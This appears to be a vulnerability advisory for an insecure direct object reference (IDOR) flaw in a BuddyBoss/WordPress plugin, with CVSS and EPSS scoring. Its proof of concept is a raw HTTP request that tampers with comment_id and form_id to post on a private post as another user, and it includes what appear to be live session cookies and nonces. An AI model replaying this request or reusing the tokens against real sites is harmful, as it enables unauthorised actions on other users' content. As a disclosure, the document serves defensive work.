CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
14.0%
Description The plugin contains an IDOR vulnerability that allows a user to comment on a private post by manipulating the ID included in the request
POST /wp-admin/admin-ajax.php HTTP/2
Host: online-communities.demos.buddyboss.com
Cookie: wordpress_sec_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7Cad6f4652de2481a56e68bdd28c294386fae37234e735065d6b90abd61ec052e9; _gcl_au=1.1.780899166.1702488357; _ga_YJ9BETCSZM=GS1.1.1702488357.1.1.1702489668.60.0.0; _ga=GA1.2.700400885.1702488358; _pin_unauth=dWlkPU1qWmpOVGhsTVRBdE16QmtNUzAwWVRJd0xXRmhaV1V0TURWaE1XUm1aall5WTJFeQ; _gid=GA1.2.1652937291.1702488358; psuid=9ba8f98a-a8df-4e85-be53-540ffc862ed1; ps5b7449d2840fc1452412f2fe=true|1700697600000; _fbp=fb.1.1702488359281.1942424250; ab-sandbox_019a643733c4caf6b40a23bdf343c136=66566579e92883ee8%7C256035; tk_ai=woo%3AYqcaaRyMBwKX1aMgKwlMVWzS; redux_current_tab=undefined; redux_current_tab_get=undefined; redux_current_tab_buddyboss_theme_options=undefined; tk_qs=; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=5e5b26d2ede9d2856d58613b04cbbc5c; wordpress_logged_in_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7C6dc658c846e2a136591d87ec20e80fe6176895bdbbbafc955959dcb2f9b35889; _gat_UA-235369-35=1; _uetsid=ae00a78099dc11eeb8b089e40d4468de; _uetvid=ae008bf099dc11ee8decf552a53d469a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://online-communities.demos.buddyboss.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 195
Origin: https://online-communities.demos.buddyboss.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
scope=all&nonce=2081885524&action=new_activity_comment&_wpnonce_new_activity_comment=bc95aefd23&comment_id=194628&form_id=194628&content=%3Cp%3ETHIS+SHOULD+NOT+HAPPEN%3Cbr%3E%3C%2Fp%3E&modbypass=
The vulnerability was identified in the comment_id and form_id parameters which allowed private post to be commented as another user.
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
14.0%